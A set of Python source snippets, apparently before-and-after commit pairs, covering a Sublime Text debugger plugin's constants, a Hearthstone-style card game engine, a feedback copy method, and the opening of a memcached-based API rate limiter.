                                      is_passing_grade=self.is_passing_grade,
                                      save_timestamp=self.save_timestamp,
                                      saved_by=self.saved_by)
        feedbackcopy.full_clean()
        # Plain copy: keep the original timestamp and do not touch
        # group.feedback / delivery.last_feedback.
        feedbackcopy.save(autoupdate_related_models=False,
                          autoset_timestamp_to_now=False)
        return feedbackcopy
|
# Module-level constants and mutable state for the GRLD debugger
# integration (a Sublime Text plugin -- see FILE_PACKAGE_SETTINGS below).

# Connection defaults.
DEFAULT_PORT = 4242 #9000
DEFAULT_IDE_KEY = 'sublime.grld'

# Populated elsewhere at runtime; None until the plugin initializes them.
PACKAGE_PATH = None
PACKAGE_FOLDER = None

# File names used for persisted plugin data.
FILE_LOG_OUTPUT = 'GRLD.log'
FILE_BREAKPOINT_DATA = 'GRLD.breakpoints'
FILE_PACKAGE_SETTINGS = 'GRLD.sublime-settings'
FILE_WATCH_DATA = 'GRLD.expressions'

# Settings/config key names.
KEY_SETTINGS = 'settings'
KEY_GRLD = 'grld'
KEY_PATH_MAPPING = "path_mapping"
KEY_IDE_KEY = "ide_key"
KEY_PORT = "port"
KEY_SUPER_GLOBALS = "super_globals"
KEY_MAX_DATA = "max_data"
KEY_MAX_DEPTH = "max_depth"
KEY_BREAK_ON_START = "break_on_start"
KEY_BREAK_ON_EXCEPTION = "break_on_exception"
KEY_CLOSE_ON_STOP = "close_on_stop"
KEY_DISABLE_LAYOUT = "disable_layout"
KEY_DEBUG_LAYOUT = "debug_layout"
KEY_DISABLE_SUBLIME_LINTER_GUTTER = "disable_sublime_linter_gutter"
# Window group/index settings for each debugger panel.
KEY_BREAKPOINT_GROUP = "breakpoint_group"
KEY_BREAKPOINT_INDEX = "breakpoint_index"
KEY_CONTEXT_GROUP = "context_group"
KEY_CONTEXT_INDEX = "context_index"
KEY_STACK_GROUP = "stack_group"
KEY_STACK_INDEX = "stack_index"
KEY_WATCH_GROUP = "watch_group"
KEY_WATCH_INDEX = "watch_index"
KEY_COROUTINES_GROUP = "coroutines_group"
KEY_COROUTINES_INDEX = "coroutines_index"
KEY_EVALUATE_GROUP = "evaluate_group"
KEY_EVALUATE_INDEX = "evaluate_index"
KEY_ICONS_GROUP = "icons_group"
KEY_ICONS_INDEX = "icons_index"
# Gutter icon settings.
KEY_BREAKPOINT_CURRENT = 'breakpoint_current'
KEY_BREAKPOINT_DISABLED = 'breakpoint_disabled'
KEY_BREAKPOINT_ENABLED = 'breakpoint_enabled'
KEY_CURRENT_LINE = 'current_line'
KEY_PYTHON_PATH = "python_path"
KEY_DEBUG = "debug"

# Region scope sources
REGION_KEY_BREAKPOINT = 'grld_breakpoint'
REGION_KEY_CURRENT = 'grld_current'
REGION_KEY_DISABLED = 'grld_disabled'
REGION_SCOPE_BREAKPOINT = 'comment.line.settings'
REGION_SCOPE_CURRENT = 'string.quoted.settings'

# Window layout for debugging output
LAYOUT_DEBUG = {
    "cols": [0.0, 0.5, 1.0],
    "rows": [0.0, 0.7, 1.0],
    "cells": [[0, 0, 2, 1], [0, 1, 1, 2], [1, 1, 2, 2]]
}
# Default single layout (similar to Alt+Shift+1)
LAYOUT_NORMAL = {
    "cols": [0.0, 1.0],
    "rows": [0.0, 1.0],
    "cells": [[0, 0, 1, 1]]
}

# Mutable session state, updated while a debug session runs.
RESTORE_LAYOUT = None
RESTORE_INDEX = None
SESSION_BUSY = False
PROTOCOL = None
BREAKPOINT = {}
CONTEXT_DATA = {}
WATCH = []
BREAKPOINT_EXCEPTION = None
# Breakpoint line number in script being debugged
BREAKPOINT_ROW = None
# Placeholder for temporary breakpoint filename and line number
BREAKPOINT_RUN = None
# Will hold breakpoint line number to show for file which is being loaded
SHOW_ROW_ONLOAD = {}
CONFIG_PROJECT = None
CONFIG_PACKAGE = None
# Keys recognized when reading configuration.
# NOTE(review): KEY_DISABLE_SUBLIME_LINTER_GUTTER and the
# coroutines/evaluate/icons group+index keys are defined above but not
# listed here -- confirm whether they should be configurable.
CONFIG_KEYS = [
    KEY_PATH_MAPPING,
    KEY_IDE_KEY,
    KEY_PORT,
    KEY_SUPER_GLOBALS,
    KEY_MAX_DATA,
    KEY_MAX_DEPTH,
    KEY_BREAK_ON_START,
    KEY_BREAK_ON_EXCEPTION,
    KEY_CLOSE_ON_STOP,
    KEY_DISABLE_LAYOUT,
    KEY_DEBUG_LAYOUT,
    KEY_BREAKPOINT_GROUP,
    KEY_BREAKPOINT_INDEX,
    KEY_CONTEXT_GROUP,
    KEY_CONTEXT_INDEX,
    KEY_STACK_GROUP,
    KEY_STACK_INDEX,
    KEY_WATCH_GROUP,
    KEY_WATCH_INDEX,
    KEY_BREAKPOINT_CURRENT,
    KEY_BREAKPOINT_DISABLED,
    KEY_BREAKPOINT_ENABLED,
    KEY_CURRENT_LINE,
    KEY_PYTHON_PATH,
    KEY_DEBUG
]
Update defaults for layout settings
# Module-level constants and mutable state for the GRLD debugger
# integration (a Sublime Text plugin -- see FILE_PACKAGE_SETTINGS below).

# Connection defaults.
DEFAULT_PORT = 4242 #9000
DEFAULT_IDE_KEY = 'sublime.grld'

# Populated elsewhere at runtime; None until the plugin initializes them.
PACKAGE_PATH = None
PACKAGE_FOLDER = None

# File names used for persisted plugin data.
FILE_LOG_OUTPUT = 'GRLD.log'
FILE_BREAKPOINT_DATA = 'GRLD.breakpoints'
FILE_PACKAGE_SETTINGS = 'GRLD.sublime-settings'
FILE_WATCH_DATA = 'GRLD.expressions'

# Settings/config key names.
KEY_SETTINGS = 'settings'
KEY_GRLD = 'grld'
KEY_PATH_MAPPING = "path_mapping"
KEY_IDE_KEY = "ide_key"
KEY_PORT = "port"
KEY_SUPER_GLOBALS = "super_globals"
KEY_MAX_DATA = "max_data"
KEY_MAX_DEPTH = "max_depth"
KEY_BREAK_ON_START = "break_on_start"
KEY_BREAK_ON_EXCEPTION = "break_on_exception"
KEY_CLOSE_ON_STOP = "close_on_stop"
KEY_DISABLE_LAYOUT = "disable_layout"
KEY_DEBUG_LAYOUT = "debug_layout"
KEY_DISABLE_SUBLIME_LINTER_GUTTER = "disable_sublime_linter_gutter"
# Window group/index settings for each debugger panel.
KEY_BREAKPOINT_GROUP = "breakpoint_group"
KEY_BREAKPOINT_INDEX = "breakpoint_index"
KEY_CONTEXT_GROUP = "context_group"
KEY_CONTEXT_INDEX = "context_index"
KEY_STACK_GROUP = "stack_group"
KEY_STACK_INDEX = "stack_index"
KEY_WATCH_GROUP = "watch_group"
KEY_WATCH_INDEX = "watch_index"
KEY_COROUTINES_GROUP = "coroutines_group"
KEY_COROUTINES_INDEX = "coroutines_index"
KEY_EVALUATE_GROUP = "evaluate_group"
KEY_EVALUATE_INDEX = "evaluate_index"
KEY_ICONS_GROUP = "icons_group"
KEY_ICONS_INDEX = "icons_index"
# Gutter icon settings.
KEY_BREAKPOINT_CURRENT = 'breakpoint_current'
KEY_BREAKPOINT_DISABLED = 'breakpoint_disabled'
KEY_BREAKPOINT_ENABLED = 'breakpoint_enabled'
KEY_CURRENT_LINE = 'current_line'
KEY_PYTHON_PATH = "python_path"
KEY_DEBUG = "debug"

# Region scope sources
REGION_KEY_BREAKPOINT = 'grld_breakpoint'
REGION_KEY_CURRENT = 'grld_current'
REGION_KEY_DISABLED = 'grld_disabled'
REGION_SCOPE_BREAKPOINT = 'comment.line.settings'
REGION_SCOPE_CURRENT = 'string.quoted.settings'

# Window layout for debugging output
LAYOUT_DEBUG = {
    "cols": [0.0, 0.05, 0.15, 0.6, 1.0],
    "rows": [0.0, 0.7, 1.0],
    # main coroutines context stack icons
    "cells": [[1, 0, 4, 1], [0, 1, 2, 2], [2, 1, 3, 2], [3, 1, 4, 2], [0, 0, 1, 1]]
}
# Default single layout (similar to Alt+Shift+1)
LAYOUT_NORMAL = {
    "cols": [0.0, 1.0],
    "rows": [0.0, 1.0],
    "cells": [[0, 0, 1, 1]]
}

# Mutable session state, updated while a debug session runs.
RESTORE_LAYOUT = None
RESTORE_INDEX = None
SESSION_BUSY = False
PROTOCOL = None
BREAKPOINT = {}
CONTEXT_DATA = {}
WATCH = []
BREAKPOINT_EXCEPTION = None
# Breakpoint line number in script being debugged
BREAKPOINT_ROW = None
# Placeholder for temporary breakpoint filename and line number
BREAKPOINT_RUN = None
# Will hold breakpoint line number to show for file which is being loaded
SHOW_ROW_ONLOAD = {}
CONFIG_PROJECT = None
CONFIG_PACKAGE = None
# Keys recognized when reading configuration.
# NOTE(review): KEY_DISABLE_SUBLIME_LINTER_GUTTER and the
# coroutines/evaluate/icons group+index keys are defined above but not
# listed here -- confirm whether they should be configurable.
CONFIG_KEYS = [
    KEY_PATH_MAPPING,
    KEY_IDE_KEY,
    KEY_PORT,
    KEY_SUPER_GLOBALS,
    KEY_MAX_DATA,
    KEY_MAX_DEPTH,
    KEY_BREAK_ON_START,
    KEY_BREAK_ON_EXCEPTION,
    KEY_CLOSE_ON_STOP,
    KEY_DISABLE_LAYOUT,
    KEY_DEBUG_LAYOUT,
    KEY_BREAKPOINT_GROUP,
    KEY_BREAKPOINT_INDEX,
    KEY_CONTEXT_GROUP,
    KEY_CONTEXT_INDEX,
    KEY_STACK_GROUP,
    KEY_STACK_INDEX,
    KEY_WATCH_GROUP,
    KEY_WATCH_INDEX,
    KEY_BREAKPOINT_CURRENT,
    KEY_BREAKPOINT_DISABLED,
    KEY_BREAKPOINT_ENABLED,
    KEY_CURRENT_LINE,
    KEY_PYTHON_PATH,
    KEY_DEBUG
]
import json
import logging
import os
import uuid
from xml.etree import ElementTree
from .entity import Entity
from .exceptions import *
from .targeting import *
from . import carddata
# Directory holding the extracted per-card XML definitions
# (../data/TextAsset relative to this package).
_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), os.path.pardir, "data", "TextAsset")
# Card id of The Coin.
THE_COIN = "GAME_005"
class XMLCard(object):
    """Read-only view of a card's XML definition file.

    Each stat is exposed as a property that reads the corresponding
    <Tag> element on access.
    """

    def __init__(self, id):
        self.file = os.path.join(_path, "%s.xml" % (id))
        self.xml = ElementTree.parse(self.file)

    def getTag(self, name):
        """Value of the first <Tag name=...>: 0 when absent, bool for
        Bool-typed tags, int otherwise."""
        found = self.xml.find('./Tag[@name="%s"]' % (name))
        if found is None:
            return 0
        attrs = found.attrib
        if attrs["type"] == "Bool":
            return bool(int(attrs["value"]))
        return int(attrs["value"])

    @property
    def name(self):
        # enUS-localized card name.
        return self.xml.findall("./Tag[@name='CardName']/enUS")[0].text

    # Stat accessors, one per XML tag of interest.
    type = property(lambda self: self.getTag("CardType"))
    health = property(lambda self: self.getTag("Health"))
    durability = property(lambda self: self.getTag("Durability"))
    atk = property(lambda self: self.getTag("Atk"))
    cost = property(lambda self: self.getTag("Cost"))
    race = property(lambda self: self.getTag("Race"))
    charge = property(lambda self: self.getTag("Charge"))
    taunt = property(lambda self: self.getTag("Taunt"))
    divineShield = property(lambda self: self.getTag("Divine Shield"))
    oneTurnEffect = property(lambda self: self.getTag("OneTurnEffect"))
    hasAura = property(lambda self: self.getTag("Aura"))
class _Card(Entity, XMLCard):
    """Runtime card instance: XML-backed stats (XMLCard) plus in-game
    state and rules, wired into the engine via Entity.

    Instances are created through the Card() factory below, which mixes
    in per-card scripted behavior from the carddata module.
    """

    # Zones a card can occupy during its lifetime.
    STATUS_DECK = 1
    STATUS_HAND = 2
    STATUS_FIELD = 3
    STATUS_GRAVEYARD = 4
    STATUS_DISCARD = 5
    # CardType tag values (see XMLCard.type).
    TYPE_HERO = 3
    TYPE_MINION = 4
    TYPE_SPELL = 5
    TYPE_ENCHANTMENT = 6
    TYPE_WEAPON = 7
    TYPE_HERO_POWER = 10

    def __init__(self, id):
        self.id = id
        self.uuid = uuid.uuid4()
        self.owner = None
        self.status = self.STATUS_DECK
        # Damage is subtracted from base health in the health property;
        # durabilityCounter is presumably consumed by getProperty -- confirm.
        self.damageCounter = 0
        self.durabilityCounter = 0
        self.summoningSickness = False
        self.weapon = None
        self.armor = 0
        super().__init__(id)
        # Live divine-shield flag, seeded from the XML value.
        self.shield = self.divineShield

    def __str__(self):
        return self.name

    def __repr__(self):
        return "<%s (%r)>" % (self.__class__.__name__, self.name)

    @property
    def game(self):
        # Reached through the owning player.
        return self.owner.game

    ##
    # Properties affected by slots
    @property
    def health(self):
        # Current health: base value minus accumulated damage, floored at 0.
        damage = self.damageCounter
        health = self.getProperty("health")
        return max(0, health - damage)

    @property
    def atk(self):
        return self.getProperty("atk")

    @property
    def durability(self):
        # NOTE(review): durabilityCounter is presumably subtracted inside
        # Entity.getProperty -- confirm.
        return self.getProperty("durability")

    @property
    def targets(self):
        return self.getTargets(self.targeting)

    def getTargets(self, t):
        # Collect legal targets for the targeting bitmask ``t``.
        ret = []
        if t & TARGET_FRIENDLY:
            if t & TARGET_HERO:
                ret.append(self.owner.hero)
            if t & TARGET_MULTIPLE:
                if t & TARGET_MINION:
                    ret += self.owner.field
        if t & TARGET_ENEMY:
            if t & TARGET_HERO:
                ret.append(self.owner.opponent.hero)
            if t & TARGET_MULTIPLE:
                if t & TARGET_MINION:
                    ret += self.owner.opponent.field
        return ret

    def hasTarget(self):
        # True when the card needs exactly one chosen target.
        return self.targeting and (not self.targeting & TARGET_MULTIPLE)

    def isValidTarget(self, card):
        if card not in self.targets:
            return False
        return super().isValidTarget(card)

    @property
    def slots(self):
        # Modifier sources currently affecting this card.
        # TODO enchantments
        ret = []
        if self.weapon:
            assert self.type == self.TYPE_HERO
            ret.append(self.weapon)
        for aura in self.game.auras:
            if aura.isValidTarget(self):
                ret.append(aura)
        return ret

    def canAttack(self):
        if self.atk == 0:
            return False
        if self.summoningSickness and not self.charge:
            return False
        return True

    def attack(self, target):
        logging.info("%r attacks %r" % (self, target))
        target.damage(self.atk)
        if self.weapon:
            # Hero attacks consume weapon durability.
            self.weapon.loseDurability()
        if target.atk:
            # Defender strikes back.
            self.damage(target.atk)

    def loseDurability(self, amount=1):
        assert self.type == self.TYPE_WEAPON
        assert self.durability
        # XXX
        # NOTE(review): increments by 1 regardless of ``amount`` although
        # the log line below reports ``amount`` -- looks like it should be
        # ``+= amount``; confirm before changing.
        self.durabilityCounter += 1
        logging.info("%r loses %i durability (now at %i)" % (self, amount, self.durability))
        if self.durability == 0:
            self.destroy()

    def gainArmor(self, amount):
        assert self.type == self.TYPE_HERO
        self.armor += amount
        logging.info("%r gains %i armor (now at %i)" % (self, amount, self.armor))

    def damage(self, amount):
        # Divine shield absorbs the whole hit, then fades.
        if self.shield:
            assert self.type is self.TYPE_MINION
            self.shield = False
            logging.info("%r's divine shield prevents %i damage. Divine shield fades." % (self, amount))
            return
        # Armor absorbs damage point-for-point before health.
        if self.armor:
            newAmount = max(0, amount - self.armor)
            self.armor -= min(self.armor, amount)
            logging.info("%r reduces damage taken by %i through armor. %i armor remaining" % (self, amount - newAmount, self.armor))
            amount = newAmount
        self.damageCounter += min(self.health, amount)
        logging.info("%r damaged for %i health (now at %i health)" % (self, amount, self.health))
        # this should happen elsewhere
        if self.health == 0:
            self.destroy()

    def heal(self, amount):
        # Healing can never exceed the damage taken.
        self.damageCounter -= min(amount, self.damageCounter)
        logging.info("%r healed for %i health (now at %i health)" % (self, amount, self.health))

    def equip(self, weapon):
        logging.info("%r equips %r" % (self, weapon))
        if self.weapon:
            # Replacing a weapon destroys the old one.
            self.weapon.destroy()
        self.weapon = weapon

    def destroy(self):
        logging.info("%r dies" % (self))
        self.status = self.STATUS_GRAVEYARD
        if self.type == self.TYPE_MINION:
            self.owner.field.remove(self)
            # Remove any aura the minion gives
            if self.hasAura:
                logging.info("Aura %r fades" % (self.aura))
                self.game.auras.remove(self.aura)
        elif self.type == self.TYPE_WEAPON:
            # HACK
            self.owner.hero.weapon = None
        elif self.type == self.TYPE_HERO:
            raise GameOver("%s wins!" % (self.owner.opponent))
        elif self.type == self.TYPE_ENCHANTMENT:
            # NOTE(review): assumes the owning *player* keeps a mutable
            # ``slots`` list -- confirm (the _Card.slots property above
            # returns a fresh list each call).
            self.owner.slots.remove(self)
        else:
            raise NotImplementedError(self.type)

    def discard(self):
        logging.info("Discarding %r" % (self))
        self.status = self.STATUS_DISCARD
        self.owner.hand.remove(self)

    def isPlayable(self):
        # NOTE(review): checks ``owner.mana`` here but play() deducts
        # ``owner.availableMana`` -- confirm both exist on the player.
        if self.owner.mana < self.cost:
            return False
        if len(self.targets) < self.minTargets:
            return False
        if self.type == self.TYPE_MINION:
            if len(self.owner.field) >= self.game.MAX_MINIONS_ON_FIELD:
                return False
        return True

    def play(self, target=None):
        logging.info("%s plays %r" % (self.owner, self))
        assert self.owner, "That minion is not mine!"
        assert self.isPlayable(), "Not enough mana!"
        self.owner.availableMana -= self.cost
        self.status = self.STATUS_FIELD
        if self.type is self.TYPE_MINION:
            self.owner.summon(self)
            self.summoningSickness = True
            if self.hasAura:
                # The aura is represented as a separate card object.
                self.aura = Card(self.aura)
                self.aura.owner = self.owner
                logging.info("Aura %r suddenly appears" % (self.aura))
                self.game.auras.append(self.aura)
        elif self.type in (self.TYPE_SPELL, self.TYPE_HERO_POWER):
            if not hasattr(self, "activate"):
                raise NotImplementedError(self)
        elif self.type == self.TYPE_WEAPON:
            self.owner.hero.equip(self)
        elif self.type == self.TYPE_HERO:
            assert isinstance(self.power, str)
            self.owner.hero = self
            # Resolve the hero power id into a real card.
            self.power = Card(self.power)
            self.power.owner = self.owner
            assert self.power.type is self.TYPE_HERO_POWER, self.power.type
        else:
            raise NotImplementedError(self.name, self.type)
        # Card must already be on the field for activate
        if self.type not in (self.TYPE_HERO, self.TYPE_HERO_POWER):
            self.owner.hand.remove(self)
        if hasattr(self, "activate"):
            logging.info("Triggering 'activate' for %r" % (self))
            if self.hasTarget():
                self.activate(target=target)
            else:
                self.activate()
def Card(id):
    # Factory: build a concrete card class on the fly -- engine behavior
    # from _Card plus scripted behavior from the carddata module (or a
    # bare ``object`` when the card has no script) -- then instantiate it.
    data = getattr(carddata, id, object)
    datadict = {
        "targeting": getattr(data, "targeting", TARGET_NONE),
        "minTargets": getattr(data, "minTargets", 0),
    }
    cardcls = type(id, (_Card, data), datadict)
    return cardcls(id)
def cardsForHero(hero):
    """Return the list of card ids making up the (currently fixed) deck.

    The *hero* argument is accepted for API symmetry but not yet used to
    vary the deck contents.
    """
    deck = (
        'CS1_042', 'CS2_118', 'CS2_119', 'CS2_120', 'CS2_121', 'CS2_124',
        'CS2_125', 'CS2_127', 'CS2_131', 'CS2_142', 'CS2_147', 'CS2_155',
        'CS2_162', 'CS2_168', 'CS2_171', 'CS2_172', 'CS2_173', 'CS2_179',
        'CS2_182', 'CS2_186', 'CS2_187', 'CS2_189', 'CS2_197', 'CS2_200',
        'CS2_201', 'CS2_213', 'EX1_015', 'EX1_506', 'EX1_582',
    )
    return list(deck)
class BaseCard(object):
    """Base for the scripted card-behavior marker classes below."""
    pass
class Minion(BaseCard):
    """Marker base class for minion card scripts."""
    pass
class Spell(BaseCard):
    """Marker base class for spell card scripts."""
    pass
class Weapon(BaseCard):
    """Marker base class for weapon card scripts."""
    pass
class Hero(BaseCard):
    """Marker base class for hero card scripts."""
    pass
class HeroPower(BaseCard):
    """Marker base class for hero-power card scripts."""
    pass
Simplify XMLCard even further
import json
import logging
import os
import uuid
from xml.etree import ElementTree
from .entity import Entity
from .exceptions import *
from .targeting import *
from . import carddata
# Directory holding the extracted per-card XML definitions
# (../data/TextAsset relative to this package).
_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), os.path.pardir, "data", "TextAsset")
# Card id of The Coin.
THE_COIN = "GAME_005"
class XMLCard(object):
    """Read-only card data backed by the card's XML definition file.

    Stat attributes (``health``, ``atk``, ...) are resolved dynamically
    through ``__getattr__`` using the ``_tags`` alias table.
    """

    # Maps attribute names to the XML <Tag name="..."> they read.
    _tags = {
        "type": "CardType",
        "health": "Health",
        "durability": "Durability",
        "atk": "Atk",
        "cost": "Cost",
        "race": "Race",
        "charge": "Charge",
        "taunt": "Taunt",
        "divineShield": "Divine Shield",
        "oneTurnEffect": "OneTurnEffect",
        "hasAura": "Aura",
    }

    def __init__(self, id):
        self.file = os.path.join(_path, "%s.xml" % (id))
        self.xml = ElementTree.parse(self.file)

    def __getattr__(self, name):
        # Only reached when normal attribute lookup fails: resolve known
        # tag aliases from the XML, fail normally for everything else.
        # Fixed: removed leftover debug print() calls and the dead
        # super()-lookup branch (any attribute the super proxy could
        # satisfy would already have been found by normal lookup before
        # __getattr__ was invoked).
        if name in self._tags:
            return self.getTag(self._tags[name])
        raise AttributeError("%s object has no attribute %r" % (type(self).__name__, name))

    def getTag(self, name):
        """Return the first <Tag name=...> value: int, bool for
        Bool-typed tags, or 0 when the tag is absent."""
        tag = self.xml.findall('./Tag[@name="%s"]' % (name))
        if not tag:
            return 0
        tag = tag[0]
        value, type = tag.attrib["value"], tag.attrib["type"]
        if type == "Bool":
            return bool(int(value))
        return int(value)

    @property
    def name(self):
        # enUS-localized card name.
        return self.xml.findall("./Tag[@name='CardName']/enUS")[0].text
class _Card(Entity, XMLCard):
    """Runtime card instance: XML-backed stats (XMLCard) plus in-game
    state and rules, wired into the engine via Entity.

    Instances are created through the Card() factory below, which mixes
    in per-card scripted behavior from the carddata module.
    """

    # Zones a card can occupy during its lifetime.
    STATUS_DECK = 1
    STATUS_HAND = 2
    STATUS_FIELD = 3
    STATUS_GRAVEYARD = 4
    STATUS_DISCARD = 5
    # CardType tag values (see XMLCard).
    TYPE_HERO = 3
    TYPE_MINION = 4
    TYPE_SPELL = 5
    TYPE_ENCHANTMENT = 6
    TYPE_WEAPON = 7
    TYPE_HERO_POWER = 10

    def __init__(self, id):
        self.id = id
        self.uuid = uuid.uuid4()
        self.owner = None
        self.status = self.STATUS_DECK
        # Damage is subtracted from base health in the health property;
        # durabilityCounter is presumably consumed by getProperty -- confirm.
        self.damageCounter = 0
        self.durabilityCounter = 0
        self.summoningSickness = False
        self.weapon = None
        self.armor = 0
        super().__init__(id)
        # Live divine-shield flag, seeded from the XML value.
        self.shield = self.divineShield

    def __str__(self):
        return self.name

    def __repr__(self):
        return "<%s (%r)>" % (self.__class__.__name__, self.name)

    @property
    def game(self):
        # Reached through the owning player.
        return self.owner.game

    ##
    # Properties affected by slots
    @property
    def health(self):
        """Current health: base value minus accumulated damage, floored at 0."""
        damage = self.damageCounter
        health = self.getProperty("health")
        return max(0, health - damage)

    @property
    def atk(self):
        return self.getProperty("atk")

    @property
    def durability(self):
        return self.getProperty("durability")

    @property
    def targets(self):
        return self.getTargets(self.targeting)

    def getTargets(self, t):
        """Collect the legal targets for the targeting bitmask ``t``."""
        ret = []
        if t & TARGET_FRIENDLY:
            if t & TARGET_HERO:
                ret.append(self.owner.hero)
            if t & TARGET_MULTIPLE:
                if t & TARGET_MINION:
                    ret += self.owner.field
        if t & TARGET_ENEMY:
            if t & TARGET_HERO:
                ret.append(self.owner.opponent.hero)
            if t & TARGET_MULTIPLE:
                if t & TARGET_MINION:
                    ret += self.owner.opponent.field
        return ret

    def hasTarget(self):
        # True when the card needs exactly one chosen target.
        return self.targeting and (not self.targeting & TARGET_MULTIPLE)

    def isValidTarget(self, card):
        if card not in self.targets:
            return False
        return super().isValidTarget(card)

    @property
    def slots(self):
        """Modifier sources currently affecting this card."""
        # TODO enchantments
        ret = []
        if self.weapon:
            assert self.type == self.TYPE_HERO
            ret.append(self.weapon)
        for aura in self.game.auras:
            if aura.isValidTarget(self):
                ret.append(aura)
        return ret

    def canAttack(self):
        if self.atk == 0:
            return False
        if self.summoningSickness and not self.charge:
            return False
        return True

    def attack(self, target):
        """Attack ``target``; hero attacks consume weapon durability and
        the defender strikes back when it has attack."""
        logging.info("%r attacks %r" % (self, target))
        target.damage(self.atk)
        if self.weapon:
            self.weapon.loseDurability()
        if target.atk:
            self.damage(target.atk)

    def loseDurability(self, amount=1):
        """Reduce weapon durability by ``amount``; destroy at 0."""
        assert self.type == self.TYPE_WEAPON
        assert self.durability
        # Fixed: was ``+= 1`` regardless of ``amount`` (old XXX marker);
        # the log line below always reported ``amount``.  Default call
        # sites (amount=1) behave exactly as before.
        self.durabilityCounter += amount
        logging.info("%r loses %i durability (now at %i)" % (self, amount, self.durability))
        if self.durability == 0:
            self.destroy()

    def gainArmor(self, amount):
        assert self.type == self.TYPE_HERO
        self.armor += amount
        logging.info("%r gains %i armor (now at %i)" % (self, amount, self.armor))

    def damage(self, amount):
        """Apply ``amount`` damage: divine shield absorbs the whole hit,
        then armor absorbs point-for-point, then health is reduced."""
        if self.shield:
            assert self.type == self.TYPE_MINION
            self.shield = False
            logging.info("%r's divine shield prevents %i damage. Divine shield fades." % (self, amount))
            return
        if self.armor:
            newAmount = max(0, amount - self.armor)
            self.armor -= min(self.armor, amount)
            logging.info("%r reduces damage taken by %i through armor. %i armor remaining" % (self, amount - newAmount, self.armor))
            amount = newAmount
        self.damageCounter += min(self.health, amount)
        logging.info("%r damaged for %i health (now at %i health)" % (self, amount, self.health))
        # this should happen elsewhere
        if self.health == 0:
            self.destroy()

    def heal(self, amount):
        # Healing can never exceed the damage taken.
        self.damageCounter -= min(amount, self.damageCounter)
        logging.info("%r healed for %i health (now at %i health)" % (self, amount, self.health))

    def equip(self, weapon):
        logging.info("%r equips %r" % (self, weapon))
        if self.weapon:
            # Replacing a weapon destroys the old one.
            self.weapon.destroy()
        self.weapon = weapon

    def destroy(self):
        """Move the card to the graveyard and undo its board presence."""
        logging.info("%r dies" % (self))
        self.status = self.STATUS_GRAVEYARD
        if self.type == self.TYPE_MINION:
            self.owner.field.remove(self)
            # Remove any aura the minion gives
            if self.hasAura:
                logging.info("Aura %r fades" % (self.aura))
                self.game.auras.remove(self.aura)
        elif self.type == self.TYPE_WEAPON:
            # HACK
            self.owner.hero.weapon = None
        elif self.type == self.TYPE_HERO:
            raise GameOver("%s wins!" % (self.owner.opponent))
        elif self.type == self.TYPE_ENCHANTMENT:
            # NOTE(review): assumes the owning *player* keeps a mutable
            # ``slots`` list -- confirm (the _Card.slots property above
            # returns a fresh list each call).
            self.owner.slots.remove(self)
        else:
            raise NotImplementedError(self.type)

    def discard(self):
        logging.info("Discarding %r" % (self))
        self.status = self.STATUS_DISCARD
        self.owner.hand.remove(self)

    def isPlayable(self):
        """Whether the owner can legally play this card right now."""
        # NOTE(review): checks ``owner.mana`` here but play() deducts
        # ``owner.availableMana`` -- confirm both exist on the player.
        if self.owner.mana < self.cost:
            return False
        if len(self.targets) < self.minTargets:
            return False
        if self.type == self.TYPE_MINION:
            if len(self.owner.field) >= self.game.MAX_MINIONS_ON_FIELD:
                return False
        return True

    def play(self, target=None):
        """Play the card from hand: pay its cost, resolve its type-specific
        placement, then trigger its scripted ``activate`` (if any)."""
        logging.info("%s plays %r" % (self.owner, self))
        assert self.owner, "That minion is not mine!"
        assert self.isPlayable(), "Not enough mana!"
        self.owner.availableMana -= self.cost
        self.status = self.STATUS_FIELD
        if self.type == self.TYPE_MINION:
            self.owner.summon(self)
            self.summoningSickness = True
            if self.hasAura:
                # The aura is represented as a separate card object.
                self.aura = Card(self.aura)
                self.aura.owner = self.owner
                logging.info("Aura %r suddenly appears" % (self.aura))
                self.game.auras.append(self.aura)
        elif self.type in (self.TYPE_SPELL, self.TYPE_HERO_POWER):
            if not hasattr(self, "activate"):
                raise NotImplementedError(self)
        elif self.type == self.TYPE_WEAPON:
            self.owner.hero.equip(self)
        elif self.type == self.TYPE_HERO:
            assert isinstance(self.power, str)
            self.owner.hero = self
            # Resolve the hero power id into a real card.
            self.power = Card(self.power)
            self.power.owner = self.owner
            assert self.power.type == self.TYPE_HERO_POWER, self.power.type
        else:
            raise NotImplementedError(self.name, self.type)
        # Card must already be on the field for activate
        if self.type not in (self.TYPE_HERO, self.TYPE_HERO_POWER):
            self.owner.hand.remove(self)
        if hasattr(self, "activate"):
            logging.info("Triggering 'activate' for %r" % (self))
            if self.hasTarget():
                self.activate(target=target)
            else:
                self.activate()
def Card(id):
    # Factory: build a concrete card class on the fly -- engine behavior
    # from _Card plus scripted behavior from the carddata module (or a
    # bare ``object`` when the card has no script) -- then instantiate it.
    data = getattr(carddata, id, object)
    datadict = {
        "targeting": getattr(data, "targeting", TARGET_NONE),
        "minTargets": getattr(data, "minTargets", 0),
    }
    cardcls = type(id, (_Card, data), datadict)
    return cardcls(id)
def cardsForHero(hero):
    """Return the list of card ids making up the (currently fixed) deck.

    The *hero* argument is accepted for API symmetry but not yet used to
    vary the deck contents.
    """
    deck = (
        'CS1_042', 'CS2_118', 'CS2_119', 'CS2_120', 'CS2_121', 'CS2_124',
        'CS2_125', 'CS2_127', 'CS2_131', 'CS2_142', 'CS2_147', 'CS2_155',
        'CS2_162', 'CS2_168', 'CS2_171', 'CS2_172', 'CS2_173', 'CS2_179',
        'CS2_182', 'CS2_186', 'CS2_187', 'CS2_189', 'CS2_197', 'CS2_200',
        'CS2_201', 'CS2_213', 'EX1_015', 'EX1_506', 'EX1_582',
    )
    return list(deck)
class BaseCard(object):
    """Base for the scripted card-behavior marker classes below."""
    pass
class Minion(BaseCard):
    """Marker base class for minion card scripts."""
    pass
class Spell(BaseCard):
    """Marker base class for spell card scripts."""
    pass
class Weapon(BaseCard):
    """Marker base class for weapon card scripts."""
    pass
class Hero(BaseCard):
    """Marker base class for hero card scripts."""
    pass
class HeroPower(BaseCard):
    """Marker base class for hero-power card scripts."""
    pass
|
#!/usr/bin/python
#-*- coding: utf-8 -*-
#
# S.Çağlar Onur <caglar@cs.princeton.edu>
from PLC.Config import Config
from PLC.Faults import PLCPermissionDenied
from datetime import datetime, timedelta
from pyaspects.meta import MetaAspect
import memcache
class BaseRateLimit(object):
    """Per-IP rate limiting for PLC API calls, backed by memcached.

    One counter is kept per (caller IP, minute); a request is rejected
